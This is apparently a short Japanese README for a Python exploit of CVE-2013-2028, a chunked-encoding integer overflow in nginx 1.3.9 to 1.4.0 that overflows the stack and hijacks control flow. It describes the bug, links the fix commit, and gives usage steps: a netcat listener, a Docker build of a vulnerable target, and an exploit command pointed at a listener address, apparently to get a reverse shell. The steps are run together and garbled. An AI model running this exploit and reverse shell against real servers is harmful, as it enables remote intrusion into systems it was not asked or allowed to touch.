
CVE-2013-2028 python エクスプロイト
脆弱性のあるソフトウェア: Nginx 1.3.9 < 1.4.0
修正コミット: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
脆弱性は関数 ngx_http_parse_chunked に存在します。このエクスプロイトは ngx_http_parse_chunked で整数オーバーフローを引き起こし、その後それを利用してスタックをオーバーフローさせ、制御フローを乗っ取ります。
実際のエクスプロイトは4つのステップで構成されています:
nc -lvp 4345)sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <リスナーマシンのアドレス> -lp <リスナーマシンのポート>